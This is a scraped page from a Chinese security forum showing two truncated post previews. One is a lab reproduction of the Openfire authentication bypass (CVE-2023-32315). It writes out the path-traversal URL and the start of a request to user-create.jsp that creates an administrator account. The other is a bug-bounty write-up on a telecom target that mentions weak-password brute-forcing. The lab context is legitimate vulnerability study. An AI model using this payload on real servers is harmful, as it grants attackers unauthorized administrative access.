Openfire 身份认证绕过漏洞(CVE-2023-32315) 靶场复现
首先进入靶场访问https://域名:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp出现上图所示的日志泄露即可确定漏洞存在接下来bp抓包,在重发器里填入以下数据包内容:GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=xxxxx&usernam
记一次电信src挖掘过程
首先找到目标网站(子域名爆破,fafo之类的)#CTL{\n}![](https://nc0.cdn.zkaq.cn/md/3529/20220526/5aee8845-2ae1-423b-8154-f1c8690f76a8.png)#CTL{\n}测试弱口令爆破是否存在#CTL{\n}![](https://nc0.cdn.zkaq.cn/md/3529/20220526/8c9f5450-a4
1